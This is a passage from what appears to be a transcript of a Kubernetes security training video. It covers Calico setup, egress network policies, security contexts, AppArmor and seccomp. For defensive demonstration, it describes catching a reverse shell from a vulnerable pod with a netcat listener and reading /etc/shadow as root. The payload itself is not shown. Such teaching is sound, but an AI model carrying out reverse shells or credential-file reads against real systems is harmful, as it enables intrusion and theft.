itself, this can help administrators limit the damage an attacker can cause. At least it can make attackers' life harder. So this is definitely a feature that we should consider using in our clusters. In this video, we are going to set up a new cluster from the scratch because when we set up our cluster in the beginning of the course, if you remember, we used a network plugin called Flannel. Flannel doesn't support network policies. This setup was intentionally done because I wanted to show that we can't use these network policies with every single plugin out there. So we are going to set up a new cluster, but this time we are going to install a new network plugin called Calico. So let's switch to the master node and configure the cluster once again. I did reset my master node as well as the worker node using kubeadm. You can do that using sudo kubeadm reset. So we will have to run this command on both the master node as well as on the worker node. So the cluster that we have set up earlier will be erased. Once that is done, we are going to configure a new cluster from scratch. I am entering this standard kubeadm init command. to begin our setup on the master node. So let's hit enter. Once this command is executed, let's run these commands by copying them from here. Copy it and let's paste it. Hit enter. And let's copy the second command and let's paste it. We will be prompted to overwrite the config file, say yes. And let's run the last command. And let's paste here. All right, now we want to install the network plugin before any worker nodes join our cluster. As I mentioned, we are going to use a network plugin called Calico. So let's open Calico website. Here it is. And this website has some great documentation. It is highly recommended that you read it. But for this demonstration, I'm going to show you everything we need. Okay, so let's go to releases. And these are the releases we have. At the time of recording this video, 3.14 is the latest version of Calico. So I'm going to use this URL to download calico.yaml. When you're watching this video, if the version is changed, you just have to replace your version here in this URL. So let's copy this URL. Since the latest version is 3.14, we are going to just use this URL here. Let's copy the URL and let's go to the master node. And let me open a new terminal. And let's use curl to download the YAML file. Curl space the URL dash uppercase O. And let's hit enter. It should download calico.yaml for us. Now let's use gedit to do some minor modifications to this YAML file. If you notice this, we have some entries that are commented out. So let's quickly uncomment these and let's provide the value of our pod network CIDR that we have used when we were initializing the cluster. So I'm removing this. The value we have used for our pod network CIDR when initializing the cluster is 10.244.0.0/16. Let's also make sure that there are no mistakes with indentation. And let's click save. And let's type kubectl apply -f calico.yaml. As you can see, Calico network plugin is now installed. Now let's go ahead and let the worker node to join this cluster. So let's go back to the previous terminal and let's copy this join command. And let's switch to the worker node and let's type sudo and let's paste the command. Hit enter. Perfect. The node has joined the cluster. Now let's go back to the master node and deploy our vulnerable application. I'm navigating to desktop, downloadables, updated files, and let's use kubectl apply -f api.yaml. Let's also deploy API service.yaml and webapp.yaml. And finally, webapp.service.yaml. With this, our vulnerable application should be up and running. Let's switch to Kali machine and see if we are able to access the application. Let's type 192.168.1.100. And as you can see, the application is accessible, but let's also check if it is functioning as expected. So let's enter some test content and click encode. As you can see, the application is working fine, even with the new plugin that we have installed. So with this, we can confirm that the application is working fine. Now let's quickly check if we can get a reverse shell. So I'm just going to a terminal and I'm going to launch a netcat listener on port 4444 And let's quickly run the payload that we have used earlier to get a reverse shell. Let's use the same payload that we have used earlier. Currently, the IP address of Kali machine is 192.168.1.93. So let's use this and click encode. And let's go back to the terminal and look at that. We have gotten a shell. Now this is what we wanted to block. We don't want the pod to make outbound connections to the attacker's machine. So let's see how we can do that using network policies. I'm switching to the master node and I'm navigating to downloadables folder. Inside this, I have a file called network-policy.yaml. Let me quickly show you the contents of the file. Here it is. If you look at this, the kind is network policy. So we are creating a network policy and we are giving it a name, API-deny-egress. The spec has a pod selector with a matching label called API. So this network policy, when installed, is going to be applied on a pod which has the label API. So if we have more than one pod which has the same label, this policy is going to be applied on all of those pods with the label. And the next one that we are interested in is the policy types. If you see this, we have specified egress. This policy types entry is used to specify a list which may include either ingress, egress, or both. The purpose of this field is to indicate whether or not the given policy applies to ingress traffic to selected pod, egress traffic from selected pod, or both. In our case, we chose egress and we did not specify any explicit whitelist rules for the egress policy type. So all outbound connections from the selected pod will be blocked. So let's quickly create this network policy in our cluster using Kubectl. So I'm typing Kubectl apply -f network-policy.yaml. Let's hit enter. And there you go. A new network policy has been created. Now let's once again go back to the Kali machine and see if we can still get the reverse shell. So I'm just closing this connection and I'm going to start a new netcat listener. There you go. And let's try to execute the command once again. Let me drag this Firefox browser slightly here so that we can see the netcat listener as well while we are running the payload here. So let's once again type this command and let's click encode. Before that, with the new network policy in place, let's quickly check if the functionality of the application is still working. So I'm just typing test. As you can see, the application is still working fine. So let's just type our payload to get a reverse shell. Let's click encode and look at that. Even after executing the payload, we are not getting a reverse shell this time because all the outbound connections on the pod are blocked using our network policy. So this is how we can use network policies to impose some ingress and egress rules and limit the attack surface. In this video, we are going to talk about security context. Security context is a feature that allows us to enforce restrictions when creating a pod or deployment. If you remember, we talked about pod security policies. When we want to enforce that pod creation should not be possible, we can use a pod security policy for that to enforce that rule at cluster level. So no pod in the cluster would be able to start as a privileged pod. We can apply the same restrictions at pod level or deployment level instead of doing that at a cluster level. So that's exactly what security context allows us to do. So I'm going to show some quick demonstrations of how we can use security context in this section of the course. We are going to first create an insecure pod, and then we are going to harden it by using this security context feature. We do have lab exercises for all of these. We are going to see how security context can be used to run pods with non-root containers, to run containers with read-only file system, to drop dangerous container capabilities, and we are also going to see how we can enforce Apparmor and Seccomp profiles using security context. So let's switch to the master node and first create an insecure pod in the cluster. I have a YAML file called insecurepod.yaml. So let's quickly take a look at the contents of this YAML file. If you see this, the kind is pod and the name we have given is insecure pod, and it has a container with the name insecure, and we are pulling busybox image from Docker Hub for all the security context lab exercises. After creating the pod, we are running sleep command for 2 hours so that we can have the container up and running for us to log in and test the security context feature in Kubernetes. So let's create a pod using this YAML file. I'm using Kubectl apply -f insecure-pod.yaml. As you can see, our pod has been created. So let's quickly check using get pods. The container is still getting created. So let's give it a minute and let's check it again. There you go. A new pod has been created and we have named it insecure pod. As we named it, it's an insecure pod and we did not apply any hardening. So let's quickly get a shell on this insecure pod by using kubectl exec-it and type insecure pod and let's type sh. There is a warning. Looks like this way of getting a shell is going to be deprecated soon. So let's exit from the shell so that I can show you the recommended way of getting a shell. All we have to do is just add -- here, and this is recommended by Kubernetes. So let's hit enter. There you go. We have gotten a shell. Now let's quickly check what privileges we have on this shell. If you closely observe this terminal, we have root access on this. So let's type ID and it confirms that we have root access because it shows that the UID is 0 and GID is 0. Now let's also try to create a new directory on this container. Make dir test folder. There you go. We are able to create a new directory. Now let's use chown command to make www-data user the owner of this folder. So I'm running this command here, test folder, hit enter. Now let's quickly check who is the owner of this directory. It's not showing the result, so let's type ls-l/ and let's grep for test and let's hit enter. Look at that, the test folder is owned by www-data user. Now let's try to see if we can read any files on this shell. Let's try to read /etc/password. There you go. Let's also try to read shadow. We are able to read it as well. Now I wanted to show you that we do have full access to the container. There are no limitations on what we can do. We got root access, we are able to create directories, we are able to change the ownership of directories, and we are also able to read any file on this container. Now this is what we wanted to prevent using security context. We want to enforce some restrictions on how these containers or pods are created. So let's begin by imposing some of these restrictions on this pod. The first one that I want to do is I want to create a container with non-root user. So let's switch to the master node and let's take a copy of insecure pod and let's call it securepod.yaml because we are going to do some hardening and we are going to make some changes to secure this pod. Okay, so let's first change the name of the pod to secure pod, and let's also change the name of the container to secure, and under spec let's add some new entries. I'm going to add security context, and let's use run as user, and let's specify some non-root UID, and let's also use run as group, and once again let's use some non-root GID, which is 1001. So this is going to create a container with a non-root user account. So let's quickly save this file, and let's try to deploy this pod by using Kubectl apply -f secure pod.yaml. So a pod has been created, and it is expected that the pod is going to run without any root privileges because we have explicitly specified the UID and GID as 1001. So let's go ahead and quickly check the list of pods. There you go, a new pod has been created, and let's use kubectl exec -it and paste the name of the pod, and let's use sh. Look at that. This time we did not get a user with root privileges. And let's also confirm that by trying to read the shadow file. Look at that, the permission has been denied. But still we should be able to read the world readable files such as hc password. Look at that, so that works. So this is how we can prevent giving root access to a container that's running in our clusters. So let's now delete this pod and let's make some more changes. All right, this pod has been deleted. Now let's go back to the slides. And the second one is run containers with read-only file system. If you remember, we were able to create new directories on the container. We don't want an attacker to write files into the container after it is compromised. This can prevent things like downloading files from an external source onto the container after the container is compromised. So let's go ahead and make the changes to the secure pod.yaml to see how this can be done. I'm switching to the master node, and let's once again open this secure pod.yaml, and let's add a new security context to the container to specify that we want to create a read-only root file system. Now remember, this particular security context has to be applied on the container. So I'm just cutting it from here, and I'm placing it inside this containers entry. So just below the command, we are adding a new security context, and let's remove these two entries from here. And let's add a new entry called read-only root file system. And let's mark it as true. Okay, now let's save the file, and let's try to create a new pod using this modified secure-pod.yaml. Kubectl apply -f secure pod.yaml. Look at that, a new pod has been created, and now let's quickly check if the pod is up and running. There it is. Now let's try to get a shell. Kubectl exec -it secure-pod --sh. Now we have added a new security context rule to say that the file system is not writable. It is read-only. We are root user on this container. Even in that case, we won't be able to create any new directories on this container. So let's try to do that. Make dir test folder. Look at that. Can't create directories. That's because it's a read-only file system. So as you can see, we managed to create a container with a read-only file system, and thus we are unable to write anything to the disk. Right, so this is great. This will prevent an attacker from writing anything onto this container. So this is how we can use read-only file system security context on the containers. Another important feature of security context is to allow or block capabilities. Root users in Linux will have many privileges when compared to non-root users. If we break these privileges down into individual pieces, they can be called capabilities. It is possible to provide root users only with some capabilities instead of providing all the capabilities available on a Linux system. So that can be done using the capabilities flag under security context. So let us see how we can prevent a user from changing the ownership of a file or folder. I'm switching to the virtual machine once again. Let's quickly delete the pod that we have created earlier. Alright, the pod has been deleted. Now let's open the YAML file in gedit. And let's make some changes to the security context once again. I'm going to add another entry called capabilities. And I'm going to add drop, under which I'm going to add a new capability. So I'm just dropping chown capability from this container. So essentially we are dropping chown capability from this container, right? So let's quickly save the file and let's once again try to create a new pod. As you can see, a new pod has been created. So let's quickly check that using kubectl get pods. There you go. Now let's quickly get a shell kubectl exec -it secure pod, and let's use sh. And let's quickly create a new directory on this container. Let me call it test folder once again. And let's try to make www-data as the owner of this file once again. So I'm typing chown www-data and let's specify test folder. Hit enter. Look at that. Even if you're a root user, the operation is not permitted because the capability is explicitly dropped for this container. So even as a root user, it is not possible to execute chown command. Similarly, we can drop all the dangerous capabilities from the container. Now let's discuss how we can enforce Apparmor and Seccomp profiles on our pods. Let's begin by working with Apparmor Profiles. If you remember, we were able to read any file on the file system, and we confirmed that by reading a world-readable file called /etc/password. Similarly, we may have other sensitive files on the container that you don't want an attacker to be able to read. Attackers also often write their temporary files into world writable directories such as /tmp. It is possible to enforce restrictions on specific files instead of making the entire file system read-only. So that's what exactly we are going to do now using Apparmor Profiles. First, let's switch to the worker node. And here on the worker node, we need to enforce an Apparmor profile on the host. So I have a profile called my profile. This is a pretty simple Apparmor profile. It basically denies write access to /tmp, and it denies reading and writing of this file, which is /etc/password. Now this is just an example, and you can take this as a reference to apply it onto other files and directories. To start with, let's copy this file called my profile into etc/apparmor.d. So we have placed our profile in Apparmor directory. Now let's load this custom Apparmor profile using sudo Apparmor underscore parser -r, and let's specify the path to the profile. So it's going to be apparmor.d/myprofile. Let's hit enter. Now to check if the Apparmor profile is loaded and enforced, we can use sudo apparmor underscore status. So let's quickly check through this output and we should see an entry called my profile. If you see this, there is an Apparmor profile called my profile available in there, and it is under enforce mode. So it is ready to use. Now, why are we doing it on the worker node? Because this is where all the pods are going to be deployed. If we want to test this Apparmor profile in our pod, we need to load this profile in all the worker nodes where the pods are going to be deployed. In our case, we only have one worker node, so we have installed this Apparmor profile on this worker node. Now the Apparmor profile is up and running. Now let's quickly go back to the master node and make some changes to the secure-pod.yaml file to enforce this Apparmor profile onto the pod. First, let's open the secure-pod.yaml and let's quickly remove this entry. And let's also change the name to secure-apparmor. And let's also change the name of the container to secure-apparmor. So now we have a YAML file using which we are going to create a pod. So let's go to the Kubernetes documentation and grab a line which can be used to enforce an Apparmor profile on this container. So this is from the Kubernetes documentation. If you look at this, we can just simply add these annotations under metadata. So let me quickly copy that and paste it here. And below that, let's add this entry here. Let's copy this. We will have to make some minor modifications to this. So let's first paste it here. And let's change this name hello with our container name. In this case, it is secure-apparmor. And let's also change the name of the profile to my profile. Okay, so we are good. Now let's save this file, and this Apparmor profile should be loaded onto the container. Let's try kubectl apply -f securepod.yaml, and looks like a new pod called secure-apparmor has been created. So let's quickly check kubectl get pods, and there is a new pod running here. So let's quickly go ahead and get a shell kubectl exec -it secure-apparmor, and let's do sh. Okay, we have gotten a shell, and if you remember, the Apparmor profile basically prevents write access to /tmp, and it prevents read-write access to /etc/password. So let's test both of them. I'm going to first read /etc/password. Look at that, permission is denied. Even though it's a world readable file and you are a root user, we are unable to read this file because of the Apparmor profile. Now let's try to add something to the /tmp directory. Look at that, can't create /tmp/test, permission denied. Now if we try to do the same thing within the current directory, it should work. Look at that. So this is how we can use Apparmor profiles to enforce restrictions on containers. Now let's discuss how we can make use of Seccomp profiles to enable or disable specific syscalls when creating a pod. Seccomp is a Linux kernel feature which can be used to restrict what actions are available within a container. In our case, we are going to use Seccomp Profiles to restrict specific syscalls. Now, simply put, Seccomp Profile for us is going to act as a firewall for syscalls. So let's see how we can do this. This is going to be similar to the Apparmor Profiles that we have used earlier, just that we are going to use it for restricting syscalls. So I am switching to the worker node once again, and I have created a simple Seccomp profile called seccomp.json. If you look at this, we are explicitly mentioning chmod here. So if this Seccomp profile is enforced on a specific pod, chmod command will not be available. As you can see here, we will throw an error if chmod is triggered. So let's see how we can make use of Seccomp profiles in Kubernetes clusters. I'm first going to create a new directory called seccomp under var lib kubelet, because this is where the Seccomp profiles are going to be picked from by default. So let's create a new directory called seccomp under var lib kubelet, and let's copy the Seccomp profile we have into this directory. There is a small typo, so let's just make it sudo, and there you go. The Seccomp profile is now saved in the right directory. Now let's switch back to the master node. We are going to make a minor change to the secure-pod.yaml once again. Now let's change the annotation by replacing this with this. Now, if you look at this, we are simply loading the seccomp.json file from localhost, which is basically the worker node. Once again, if we want to enforce Seccomp profiles on the pods, the Seccomp profile has to be available on the underlying host, which is the worker node in this case. If we have multiple worker nodes, the Seccomp profiles must be available on all the worker nodes. Now, let's also rename the pod and container to match our demo. So I'm just calling it seccomp, and I'm changing the name of the container to seccomp. And let's save the file and let's deploy the pod. There you go. Now let's try to get the list of pods running. Look at that. There is a new pod that is running here. So let's get a shell. -it, and let's paste the name of the pod, and let's also use --sh. There you go, we have gotten a shell. Now let's quickly create a new file called test, and let's try to change the permissions by using chmod. Look at that. Even though you are a root user, this operation is not permitted because of the restrictions enforced by the Seccomp profile. This is how Seccomp profiles can be used to restrict what syscalls can be invoked from within the container.